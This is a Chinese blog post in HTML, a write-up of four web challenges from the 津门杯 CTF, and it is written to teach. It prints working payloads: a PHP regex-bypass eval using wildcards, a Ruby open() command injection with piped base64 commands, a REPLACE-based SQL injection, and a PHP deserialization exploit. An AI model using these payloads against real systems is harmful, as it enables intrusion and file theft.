<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.2.0">
<script>
(function(){
    if(''){
        if (prompt('请输入文章密码') !== ''){
            alert('密码错误！');
            history.back();
        }
    }
})();
</script>
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/aixin.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/aixin.png">
  <link rel="mask-icon" href="/images/aixin.png" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="//img.hzy2003628.top/busuanzi/jquery.fancybox.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-big-counter.min.css">
  <script src="true"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"hzy2003628.top","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"flat"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"valine","storage":true,"lazyload":false,"nav":null,"activeClass":"valine"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":-1,"unescape":false,"preload":true},"motion":{"enable":false,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideLeftIn"}},"path":"search.xml"};
  </script>



<script>
(function(){
var src = "https://s.ssl.qhres2.com/ssl/ab77b6ea7f3fbf79.js";
document.write('<script src="' + src + '" id="sozz"><\/script>');
})();
</script>




<!-- title、keywords、desc关键字 -->

  <title>留言板</title>
  <meta name="title" content="留言板" />






 <script>(function(i,s,o,g,r,a,m){i["DaoVoiceObject"]=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;a.charset="utf-8";m.parentNode.insertBefore(a,m)})(window,document,"script",('https:' == document.location.protocol ? 'https:' : 'http:') + "//widget.daovoice.io/widget/b6dbddb6.js","daovoice")
 daovoice('init', {
  app_id: "6f081c2c"
});
daovoice('update');
 </script>
 





<!-- 春节灯笼代码段 -->
<div id="lantern-wrapper" class="lantern-wrapper" no-select></div>
<script src="http://img.hzy2003628.top/busuanzi/lantern.min.js"></script>
<script>
    let lantern = new Lantern('lantern-wrapper', {
        date: {								// 日期格式：'月-日'
            from: '12-20',					// 开始悬挂灯笼的日期
            to: '1-31'						// 结束悬挂灯笼的日期
        },
        postion: {
            zIndex: 9999,					// 整个灯笼的 z-index 属性
            lanternRL: [10, 150, 150, 10],	// 灯笼距离边界的距离：左侧灯笼距离左边的距离，右侧登录距离右侧的距离；页面灯笼从左往右依次设置
            lanternTop: 0					// 灯笼距离顶部的距离。你也可以使用数组从左往右依次设置每个灯笼的距顶距离，例如：[0, 100, 200, 300]
        },
        content: '新春快乐'					 // 灯笼内显示的文字，只会截取前四个字符
    });
</script>


  <meta name="description" content="第五届世界智能大会[津门杯]，随便找点以往的比赛题目做一下，提高一下自己！">
<meta property="og:type" content="article">
<meta property="og:title" content="第五届世界智能大会[津门杯]">
<meta property="og:url" content="https://hzy2003628.top/2022/06/01/%E7%AC%AC%E4%BA%94%E5%B1%8A%E4%B8%96%E7%95%8C%E6%99%BA%E8%83%BD%E5%A4%A7%E4%BC%9A/index.html">
<meta property="og:site_name" content="风尘孤狼">
<meta property="og:description" content="第五届世界智能大会[津门杯]，随便找点以往的比赛题目做一下，提高一下自己！">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://z4a.net/images/2022/05/18/imageddec83d48ad6619f.png">
<meta property="og:image" content="http://imgconvert.csdnimg.cn/aHR0cHM6Ly9pbWcyMDIwLmNuYmxvZ3MuY29tL2Jsb2cvMTM2MzQ3OC8yMDIwMDkvMTM2MzQ3OC0yMDIwMDkwNTA4NDUyMDEwOC0xNjMyMjQxOTM3LnBuZw?x-oss-process=image/format,png">
<meta property="og:image" content="https://z4a.net/images/2022/06/01/image7bb9f010bdf11bba.png">
<meta property="og:image" content="https://z4a.net/images/2022/06/01/image22040242e923ce5c.png">
<meta property="og:image" content="https://z4a.net/images/2022/06/01/imagee00f24ffd22e873c.png">
<meta property="og:image" content="https://z4a.net/images/2022/06/01/imagea40182e15362e93d.png">
<meta property="og:image" content="https://z4a.net/images/2022/06/01/image26b24c7c2b96d2df.png">
<meta property="og:image" content="https://z4a.net/images/2022/06/01/image397239883e30c71d.png">
<meta property="og:image" content="https://z4a.net/images/2022/06/01/image9f3eac424c54a0c5.png">
<meta property="og:image" content="https://z4a.net/images/2022/06/01/image6efb429399936ca0.png">
<meta property="og:image" content="https://z4a.net/images/2022/06/02/image.png">
<meta property="og:image" content="https://z4a.net/images/2022/06/02/imageb0049ad14b1c9554.png">
<meta property="og:image" content="https://z4a.net/images/2022/06/02/image2e7cc021c9235c9c.png">
<meta property="og:image" content="https://z4a.net/images/2022/06/02/image5a1ff1ed20b79246.png">
<meta property="og:image" content="https://z4a.net/images/2022/06/02/image9c886f41229594dd.png">
<meta property="og:image" content="https://z4a.net/images/2022/06/02/image85d1e6c8234890ca.png">
<meta property="og:image" content="https://z4a.net/images/2022/06/02/image56affc20afdb8901.png">
<meta property="article:published_time" content="2022-06-01T14:20:56.000Z">
<meta property="article:modified_time" content="2022-06-02T04:29:30.073Z">
<meta property="article:author" content="故里">
<meta property="article:tag" content="赛后复盘">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://z4a.net/images/2022/05/18/imageddec83d48ad6619f.png">

<link rel="canonical" href="https://hzy2003628.top/2022/06/01/%E7%AC%AC%E4%BA%94%E5%B1%8A%E4%B8%96%E7%95%8C%E6%99%BA%E8%83%BD%E5%A4%A7%E4%BC%9A/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>



  <title>第五届世界智能大会[津门杯] | 风尘孤狼</title>
  


  <script data-pjax>
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?d1ea9671a278a2cb33e24c76d08af22f";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">

<!-- 加入APlayer音乐播放器 -->
<link rel="stylesheet" href="/dist/APlayer.min.css">
<div id="aplayer"></div>
<script type="text/javascript" src="/dist/APlayer.min.js"></script>
<script type="text/javascript" src="/dist/music.js"></script>

  <div class="container">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">风尘孤狼</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">知识型学习记录</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">38</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">19</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">108</span></a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-links">

    <a href="/links/" rel="section"><i class="fa fa-link fa-fw"></i>友链</a>

  </li>
        <li class="menu-item menu-item-love">

    <a href="/Love/" rel="section"><i class="fa fa-heartbeat fa-fw"></i>Love</a>

  </li>
        <li class="menu-item menu-item-loveshow">

    <a href="/LoveShow/" rel="section"><i class="fa fa-heartbeat fa-fw"></i>LoveShow</a>

  </li>
        <li class="menu-item menu-item-whisper">

    <a href="/Whisper/" rel="section"><i class="fa fa-calendar fa-fw"></i>微言</a>

  </li>
        <li class="menu-item menu-item-guestbook">

    <a href="/guestbook/" rel="section"><i class="fa fa-book fa-fw"></i>留言板</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>




    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://hzy2003628.top/2022/06/01/%E7%AC%AC%E4%BA%94%E5%B1%8A%E4%B8%96%E7%95%8C%E6%99%BA%E8%83%BD%E5%A4%A7%E4%BC%9A/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="故里">
      <meta itemprop="description" content="没有所谓失败，除非你不再尝试">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="风尘孤狼">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          第五届世界智能大会[津门杯]
        </h1>

        <div class="post-meta">  
		 
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-06-01 22:20:56" itemprop="dateCreated datePublished" datetime="2022-06-01T22:20:56+08:00">2022-06-01</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-06-02 12:29:30" itemprop="dateModified" datetime="2022-06-02T12:29:30+08:00">2022-06-02</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E8%B5%9B%E5%90%8E%E5%A4%8D%E7%9B%98/" itemprop="url" rel="index"><span itemprop="name">赛后复盘</span></a>
                </span>
            </span>

          
            <span id="/2022/06/01/%E7%AC%AC%E4%BA%94%E5%B1%8A%E4%B8%96%E7%95%8C%E6%99%BA%E8%83%BD%E5%A4%A7%E4%BC%9A/" class="post-meta-item leancloud_visitors" data-flag-title="第五届世界智能大会[津门杯]" title="阅读次数">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span class="leancloud-visitors-count"></span>
            </span>
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2022/06/01/%E7%AC%AC%E4%BA%94%E5%B1%8A%E4%B8%96%E7%95%8C%E6%99%BA%E8%83%BD%E5%A4%A7%E4%BC%9A/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2022/06/01/%E7%AC%AC%E4%BA%94%E5%B1%8A%E4%B8%96%E7%95%8C%E6%99%BA%E8%83%BD%E5%A4%A7%E4%BC%9A/" itemprop="commentCount"></span>
    </a>
  </span>
  
  <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>11k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>10 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>第五届世界智能大会[津门杯]，随便找点以往的比赛题目做一下，提高一下自己！</p>
<span id="more"></span>
<h1 id="hate_php">hate_php</h1>
<pre><code class="hljs plaintext">&lt;?php
error_reporting(0);
if(!isset($_GET[&#x27;code&#x27;]))&#123;
    highlight_file(__FILE__);
&#125;else&#123;
    $code = $_GET[&#x27;code&#x27;];
    if(preg_match(&quot;/[A-Za-z0-9_$@]+/&quot;,$code))&#123;
        die(&#x27;fighting!&#x27;); 
    &#125;
    eval($code);
&#125;</code></pre>
<p>代码审计，首先知道的是过滤了字母大小写和数字，还有三个字符</p>
<p>_$@，对输入code进行了正则表达式的匹配。</p>
<p>这道题关键就是绕过正则匹配，来执行后面的eval函数</p>
<blockquote>
<ul>
<li>解题思路</li>
<li>利用通配符调用Linux系统命令来查看flag</li>
<li>在Linux系统中可以使用 ? * 等字符来正则匹配字母</li>
<li>星号(*)可以用来代替0个及以上任意字符</li>
<li>问号(?)可以用来代替1个任意字符，比如 /???/??? =&gt; /bin/cat</li>
</ul>
</blockquote>
<p>首先，构造payload:</p>
<pre><code class="hljs plaintext">?&gt;&lt;?=`/???/???%20/???/???/????/*`?&gt;
php使用短链接含义如下：
&lt;?php echo `/bin/cat /var/www/html/index.php`?&gt;</code></pre>
<p>可以看到源码，直接读取flag文件试。</p>
<pre><code class="hljs plaintext">?&gt;&lt;?=`/???/??? /????`?&gt;
php使用短链接含义如下：
&lt;?php echo `/bin/cat /flag`?&gt;</code></pre>
<p><img src="https://z4a.net/images/2022/05/18/imageddec83d48ad6619f.png" alt></p>
<h1 id="png图片转换器">PNG图片转换器</h1>
<ul>
<li>代码审计</li>
<li>open函数命令执行漏洞</li>
</ul>
<p>这道题附件直接给了源码，分析一下</p>
<pre><code class="hljs plaintext">require &#x27;sinatra&#x27;
require &#x27;digest&#x27;
require &#x27;base64&#x27;

get &#x27;/&#x27; do
  open(&quot;./view/index.html&quot;, &#x27;r&#x27;).read()
end

get &#x27;/upload&#x27; do
  open(&quot;./view/upload.html&quot;, &#x27;r&#x27;).read()
end

post &#x27;/upload&#x27; do
  unless params[:file] &amp;&amp; params[:file][:tempfile] &amp;&amp; params[:file][:filename] &amp;&amp; params[:file][:filename].split(&#x27;.&#x27;)[-1] == &#x27;png&#x27;
    return &quot;&lt;script&gt;alert(&#x27;error&#x27;);location.href=&#x27;/upload&#x27;;&lt;/script&gt;&quot;
  end
  begin
    filename = Digest::MD5.hexdigest(Time.now.to_i.to_s + params[:file][:filename]) + &#x27;.png&#x27;
    open(filename, &#x27;wb&#x27;) &#123; |f|
      f.write open(params[:file][:tempfile],&#x27;r&#x27;).read()
    &#125;
    &quot;Upload success, file stored at #&#123;filename&#125;&quot;
  rescue
    &#x27;something wrong&#x27;
  end

end

get &#x27;/convert&#x27; do
  open(&quot;./view/convert.html&quot;, &#x27;r&#x27;).read()
end

post &#x27;/convert&#x27; do
  begin
    unless params[&#x27;file&#x27;]
      return &quot;&lt;script&gt;alert(&#x27;error&#x27;);location.href=&#x27;/convert&#x27;;&lt;/script&gt;&quot;
    end

    file = params[&#x27;file&#x27;]
    unless file.index(&#x27;..&#x27;) == nil &amp;&amp; file.index(&#x27;/&#x27;) == nil &amp;&amp; file =~ /^(.+)\.png$/
      return &quot;&lt;script&gt;alert(&#x27;dont hack me&#x27;);&lt;/script&gt;&quot;
    end
    res = open(file, &#x27;r&#x27;).read()
    headers &#x27;Content-Type&#x27; =&gt; &quot;text/html; charset=utf-8&quot;
    &quot;var img = document.createElement(\&quot;img\&quot;);\nimg.src= \&quot;data:image/png;base64,&quot; + Base64.encode64(res).gsub(/\s*/, &#x27;&#x27;) + &quot;\&quot;;\n&quot;
  rescue
    &#x27;something wrong&#x27;
  end
end</code></pre>
<blockquote>
<p>这里先介绍以一下<strong>linux中反引号的作用</strong>，凡是打上反引号的命令，首先将反引号内的命令执行一次，然后再将已经执行过的命令得到的结果再执行一次，就可以得到我们反引号的输出，比如我们输入命令：</p>
<pre><code class="hljs plaintext">`echo cat hello.txt`</code></pre>
<p><img src="http://imgconvert.csdnimg.cn/aHR0cHM6Ly9pbWcyMDIwLmNuYmxvZ3MuY29tL2Jsb2cvMTM2MzQ3OC8yMDIwMDkvMTM2MzQ3OC0yMDIwMDkwNTA4NDUyMDEwOC0xNjMyMjQxOTM3LnBuZw?x-oss-process=image/format,png" alt></p>
<p><strong>linux中|管道符的作用</strong></p>
<p>| 管道符的作用是 把 管道符左边的的输出 当做右边命令后面待处理的结果</p>
<p>例如：</p>
<pre><code class="hljs plaintext">ls -lha ~ | more| grep a &gt;haha.txt</code></pre>
</blockquote>
<p>在源码中我们可以发现有个open函数</p>
<pre><code class="hljs plaintext">res = open(file, &#x27;r&#x27;).read()</code></pre>
<p>存在命令执行漏洞<img src="https://z4a.net/images/2022/06/01/image7bb9f010bdf11bba.png" alt="image7bb9f010bdf11bba.png"></p>
<p>这里随便上传一个png文件之后会返回base64加密后的png文件名</p>
<p><img src="https://z4a.net/images/2022/06/01/image22040242e923ce5c.png" alt="image22040242e923ce5c.png"></p>
<p>这里用到的是这个open函数，所以可以把shell写入图片然后加上管道符，之后再执行open函数就可执行shell命令。</p>
<p>首先先上传一个图片<img src="https://z4a.net/images/2022/06/01/imagee00f24ffd22e873c.png" alt="imagee00f24ffd22e873c.png"></p>
<p>然后输入图片base64加密的文件名查看一下，发现的确进行了base64加密<img src="https://z4a.net/images/2022/06/01/imagea40182e15362e93d.png" alt="imagea40182e15362e93d.png"></p>
<p>因为它把<code>/</code>给过滤了。，所以对命令进行base64加密之后再使用，同时最后要加上之前传的那个文件名。<img src="https://z4a.net/images/2022/06/01/image26b24c7c2b96d2df.png" alt="image26b24c7c2b96d2df.png"></p>
<pre><code class="hljs plaintext">file=| `echo bHMgLw==(ls /) | base64 -d` &gt; 879550a80023144a9b58dcc288f3f4f3.png</code></pre>
<p>这里使用管道符<code>|</code>引导后边的shell命令，使用反引号```，就是先进行反引号的shell的base64解密，然后把解密的命令输出,并将输出的结果重定向到上传好的图片。</p>
<p>这个时候再访问那个图片，可以看到已经写进去了，base64揭秘之后得到根目录下的文件<img src="https://z4a.net/images/2022/06/01/image397239883e30c71d.png" alt="image397239883e30c71d.png"></p>
<pre><code class="hljs plaintext">bin
boot
dev
etc
flag_28244
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var</code></pre>
<p>根据同样的方法，shell <code>cat /flag_28244</code></p>
<pre><code class="hljs plaintext">file=| `echo Y2F0IC9mbGFnXzI4MjQ0 | base64 -d` &gt; 879550a80023144a9b58dcc288f3f4f3.png</code></pre>
<p>再次访问这个图片就可以得到base64加密的flag<img src="https://z4a.net/images/2022/06/01/image9f3eac424c54a0c5.png" alt="image9f3eac424c54a0c5.png"></p>
<p>解密得到flag<img src="https://z4a.net/images/2022/06/01/image6efb429399936ca0.png" alt="image6efb429399936ca0.png"></p>
<pre><code class="hljs plaintext">ctfhub&#123;d7032802097b5eb927bc3b73&#125;</code></pre>
<h1 id="yet_another_mysql_injection">yet_another_mysql_injection</h1>
<ul>
<li>SQL注入</li>
<li>代码审计</li>
</ul>
<p>首先进去之后是个登录框，查看源码得到提示<img src="https://z4a.net/images/2022/06/02/image.png" alt="image.png"></p>
<p><img src="https://z4a.net/images/2022/06/02/imageb0049ad14b1c9554.png" alt="imageb0049ad14b1c9554.png"></p>
<p>访问<code>/?source</code>得到源码<img src="https://z4a.net/images/2022/06/02/image2e7cc021c9235c9c.png" alt="image2e7cc021c9235c9c.png"></p>
<p>通过审计之后发现通过<code>if ($username !== 'admin')</code>限制了用户名为<code>admin</code>，同时输入的密码会进入<code>checkSql</code>这个函数里面，不难发现这个函数机型正则匹配，过滤了<code>/regexp|between|in|flag|=|&gt;|&lt;|and|\||right|left|reverse|update|extractvalue|floor|substr|&amp;|;|\\\$|0x|sleep|\ /i</code>，大小写都过滤了</p>
<blockquote>
<p><code>if (isset($_POST['username']) &amp;&amp; $_POST['username'] != '' &amp;&amp; isset($_POST['password']) &amp;&amp; $_POST['password'] != '')同时在这里，对输入的密码和sql查询得密码进行了判断。</code></p>
</blockquote>
<p>过程就是判断用户名是否为admin-&gt;密码进行checkSql函数检测-&gt;用户名和密码带入数据库进行密码查询-&gt;查询后的值不能为空-&gt;查询后的值需要和你输入的值一样。</p>
<blockquote>
<p>介绍一下replace函数的作用。语法：replace(object,search,replace)、语义：把object对象中出现的的search全部替换成replace。实例：select replace(‘abc’,‘b’,‘123’)。最终结果为a123c</p>
</blockquote>
<p>这道题就是使用replace函数进行绕过，payload如下:</p>
<pre><code class="hljs plaintext">1&#x27;UNION(SELECT(REPLACE(REPLACE(&#x27;1&quot;UNION(SELECT(REPLACE(REPLACE(&quot;%&quot;,CHAR(34),CHAR(39)),CHAR(37),&quot;%&quot;)))#&#x27;,CHAR(34),CHAR(39)),CHAR(37),&#x27;1&quot;UNION(SELECT(REPLACE(REPLACE(&quot;%&quot;,CHAR(34),CHAR(39)),CHAR(37),&quot;%&quot;)))#&#x27;)))#</code></pre>
<blockquote>
<p>这里使用了两次replace函数，把1’UNION(SELECT(REPLACE(REPLACE('1&quot;UNION(SELECT(REPLACE(REPLACE(“%”,CHAR(34),CHAR(39)),CHAR(37),“%”)))#看成整体更容易理解，这个就相当于先把“替换成‘，然后再把%替换成1’UNION(SELECT(REPLACE(REPLACE('1&quot;UNION(SELECT(REPLACE(REPLACE(“%”,CHAR(34),CHAR(39)),CHAR(37),“%”)))#</p>
</blockquote>
<p>经过这两次替换，得到的值就和2输出的值一样了。</p>
<pre><code class="hljs plaintext">ctfhub&#123;f80e6d849c2202aa2aa253ef&#125;</code></pre>
<h1 id="pklovecloud">pklovecloud</h1>
<ul>
<li>
<p>反序列化</p>
</li>
<li>
<p>__toString函数</p>
</li>
</ul>
<pre><code class="hljs plaintext">&lt;?php  
include &#x27;flag.php&#x27;;
class pkshow 
&#123;  
    function echo_name()     
    &#123;          
        return &quot;Pk very safe^.^&quot;;      
    &#125;  
&#125; 

class acp 
&#123;   
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct() 
    &#123;      
        $this-&gt;cinder = new pkshow;
    &#125;  
    function __toString()      
    &#123;          
        if (isset($this-&gt;cinder))  
            return $this-&gt;cinder-&gt;echo_name();      
    &#125;  
&#125;  

class ace
&#123;    
    public $filename;     
    public $openstack;
    public $docker; 
    function echo_name()      
    &#123;   
        $this-&gt;openstack = unserialize($this-&gt;docker);
        $this-&gt;openstack-&gt;neutron = $heat;
        if($this-&gt;openstack-&gt;neutron === $this-&gt;openstack-&gt;nova)
        &#123;
        $file = &quot;./&#123;$this-&gt;filename&#125;&quot;;
            if (file_get_contents($file))         
            &#123;              
                return file_get_contents($file); 
            &#125;  
            else 
            &#123; 
                return &quot;keystone lost~&quot;; 
            &#125;    
        &#125;
    &#125;  
&#125;  

if (isset($_GET[&#x27;pks&#x27;]))  
&#123;
    $logData = unserialize($_GET[&#x27;pks&#x27;]);
    echo $logData; 
&#125; 
else 
&#123; 
    highlight_file(__file__); 
&#125;
?&gt;</code></pre>
<p>一步一步分析一下，</p>
<pre><code class="hljs plaintext">include &#x27;flag.php&#x27;
这个说明该目录就是flag.php，只要想办法读取这个内容，就会得到flag。</code></pre>
<pre><code class="hljs plaintext">class pkshow 
&#123;  
    function echo_name()     
    &#123;          
        return &quot;Pk very safe^.^&quot;;      
    &#125;  
&#125; 
这个pkshow类，没有啥利用点，也看到了最后的返回值是Pk very safe^.^</code></pre>
<pre><code class="hljs plaintext">class acp 
&#123;   
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct() 
    &#123;      
        $this-&gt;cinder = new pkshow;
    &#125;  
    function __toString()      
    &#123;          
        if (isset($this-&gt;cinder))  
            return $this-&gt;cinder-&gt;echo_name();      
    &#125;  
&#125;  
重点就在这个acp类，可以看到有两个魔法函数，_construct()和_toSring()，但是_construct()这个函数是用到了pkshow这个库，前面说了这个库没有用，所以重点就是_tostring这个库，通过这个函数可以进到ace函数里面，同时执行echo_name函数读取到flag内容。</code></pre>
<pre><code class="hljs plaintext">class ace
&#123;    
    public $filename;     
    public $openstack;
    public $docker; 
    function echo_name()      
    &#123;   
        $this-&gt;openstack = unserialize($this-&gt;docker);
        $this-&gt;openstack-&gt;neutron = $heat;
        if($this-&gt;openstack-&gt;neutron === $this-&gt;openstack-&gt;nova)
        &#123;
        $file = &quot;./&#123;$this-&gt;filename&#125;&quot;;
            if (file_get_contents($file))         
            &#123;              
                return file_get_contents($file); 
            &#125;  
            else 
            &#123; 
                return &quot;keystone lost~&quot;; 
            &#125;    
        &#125;
    &#125;  
&#125;  
这个ace类，触发echo_name函数就会执行下面的程序，也就是读取到了flag.php
 $this-&gt;openstack = unserialize($this-&gt;docker);这个是反序列化docker的值并赋值给openstack
  if($this-&gt;openstack-&gt;neutron === $this-&gt;openstack-&gt;nova)这个是进行判断两者是否相等
  相等就会执行 if (file_get_contents($file))         
            &#123;              
                return file_get_contents($file)
            &#125;  读取内容并返回值</code></pre>
<pre><code class="hljs plaintext">if (isset($_GET[&#x27;pks&#x27;]))  
&#123;
    $logData = unserialize($_GET[&#x27;pks&#x27;]);
    echo $logData; 
&#125; 
最后的这个是接收参数进行反序列化，并赋值给logdata，同时echo时就会触发类中的_tostring()</code></pre>
<p>下面就是构造payload，要求也就是上面分析的这些</p>
<ul>
<li>
<p>先是进入到acp类，修改cinder的值为ace</p>
</li>
<li>
<p>然后进入到ace类后，将docker的值反序列化后等于acp</p>
</li>
<li>
<p>docker的值反序列化后赋值给openstrack，也就是让openstrack等于acp，所以需要让acp类中的neutron和nova的值相等</p>
</li>
<li>
<p>最后保证filename的值等于flag.php</p>
</li>
</ul>
<pre><code class="hljs plaintext">if($this-&gt;openstack-&gt;neutron === $this-&gt;openstack-&gt;nova)通过空返回染过这个判断，也就是让其null==null</code></pre>
<pre><code class="hljs plaintext">$this-&gt;openstack = unserialize($this-&gt;docker);当docker为空时，this-&gt;openstack自然为空对象，则$this-&gt;openstack-&gt;neutron === $this-&gt;openstack-&gt;nova两侧都为null自然可绕过。</code></pre>
<p>首先先测试一下</p>
<pre><code class="hljs plaintext">&lt;?php

$a=&quot;&quot;;
$b=unserialize($a);
var_dump($b);//bool(false)
var_dump($a-&gt;sss);//报异常并返回null
var_dump($a-&gt;ttt-&gt;xxx===null);//bool(true)
?&gt;</code></pre>
<p><img src="https://z4a.net/images/2022/06/02/image5a1ff1ed20b79246.png" alt="image5a1ff1ed20b79246.png"></p>
<p>构造exp</p>
<pre><code class="hljs plaintext">&lt;?php
class acp 
&#123;   
    public $cinder;  
    public $neutron;
    public $nova;
&#125;
class ace
&#123;    
    public $filename;     
    public $openstack;
    public $docker;
&#125;
$b=new acp;
$c=new ace;
$b-&gt;cinder=$c;
$c-&gt;docker=&#x27;&#x27;;
$c-&gt;filename=&#x27;/flag.php&#x27;;
echo urlencode(serialize($b));

?&gt;</code></pre>
